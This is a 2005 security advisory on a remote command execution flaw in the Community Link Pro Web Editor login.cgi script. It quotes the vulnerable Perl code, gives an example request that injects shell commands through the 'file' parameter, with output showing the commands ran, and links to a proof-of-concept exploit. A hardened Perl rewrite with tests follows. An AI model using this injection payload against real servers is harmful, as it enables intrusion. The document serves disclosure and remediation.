prowebExec.txt

2005-07-01T00:00:00
ID PACKETSTORM:38371
Type packetstorm
Reporter mozako
Modified 2005-07-01T00:00:00

Description

                                        
                                            `- - - - - - - - - - - - - - - - - - - - - - - - -   
BADROOT SECURITY GROUP  
Security Advisory 2005-#0x05  
http://www.badroot.org  
irc.us.azzurra.org ~ #badroot  
- - - - - - - - - - - - - - - - - - - - - - - - -   
  
Authors ....... spher3 (spher3 at fatalimpulse dot net)   
mozako (admin at fatalimpulse dot net)  
Date ............. 29-06-2005  
Product ....... Community Link Pro Web Editor (login.cgi)  
Type ............ Remote Command Execution  
  
o Description:  
============================  
Login.cgi is a login script written in Perl by Community Link Pro Web Editor  
that allows a remote user to log in to his own personal page.  
  
o Vulnerable Code:  
============================  
[...]  
open(FILE2,"$memberspath/$FORM{'username'}/$FORM{'file'}");  
foreach (<FILE2>) {  
print;  
}  
close(FILE2);  
[...]  
  
This code applies no validation to the CGI query, specifically to $FORM{'file'}.  
The value goes straight into Perl's two-argument open(), which runs a file name  
ending in | as a command and returns its output, so a remote user can run system  
commands (Remote Command Execution Vulnerability) with a string  
like login.cgi?username=&command=simple&do=edit&password=&file=|COMMAND|.  
  
Example:  
  
http://www.hostvuln.net/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=|uname -a; id|  
  
Linux host.vuln.net 2.6.10-3mdk #1 Tue Feb 22 01:32:42 CET 2005 i686 unknown unknown GNU/Linux  
uid=72(apache) gid=72(apache) groups=72(apache)  
  
  
o Proof of concept:  
============================  
You can download a simple PoC Exploit from:   
http://www.badroot.org/exploits/clogin.pl  
  
Original ADV:  
http://www.badroot.org/advisories/SA0x05  
  
`
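A hardened form of the file read shown under "Vulnerable Code", as an added example that is not part of the original advisory or the vendor's code. The function names `member_file_path` and `read_member_file`, the allowlist pattern and the temporary directory are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: hardened form of the file read in login.cgi (not the vendor's code).
use strict;
use warnings;
use File::Temp qw(tempdir);
use File::Spec;
use Cwd qw(realpath);

# Resolve a member's file to a path inside $memberspath, or return undef.
# Both names must match an allowlist (assumed pattern), so '|', ';' and '/'
# never reach open().
sub member_file_path {
    my ($memberspath, $user, $file) = @_;
    for my $name ($user, $file) {
        return undef unless defined $name
            && $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    }
    my $base = realpath($memberspath);
    my $path = realpath(File::Spec->catfile($memberspath, $user, $file));
    # realpath() follows symlinks; the result must still sit under the base.
    return undef unless defined $base && defined $path && -f $path;
    return index($path, "$base/") == 0 ? $path : undef;
}

# Read the file with three-argument open: the '<' mode is fixed, so the
# path is only ever treated as a file name, never as a command.
sub read_member_file {
    my $path = member_file_path(@_) or return undef;
    open(my $fh, '<', $path) or return undef;
    local $/;                      # slurp the whole file
    my $data = <$fh>;
    close($fh);
    return $data;
}

# Constructed test data: a temporary members directory with one page.
my $members = tempdir(CLEANUP => 1);
mkdir "$members/alice" or die "mkdir: $!";
open(my $out, '>', "$members/alice/index.html") or die "open: $!";
print {$out} "<h1>alice</h1>\n";
close($out);

# Constructed inputs: a valid request, then the query values from the advisory.
for my $req (['alice', 'index.html'],
             ['', '|uname -a; id|']) {
    my $data = read_member_file($members, @$req);
    printf "%-8s %-18s => %s", "'$req->[0]'", "'$req->[1]'",
        defined $data ? $data : "rejected\n";
}
```

The valid request prints the page contents; the advisory's values are rejected by the allowlist before any file is opened.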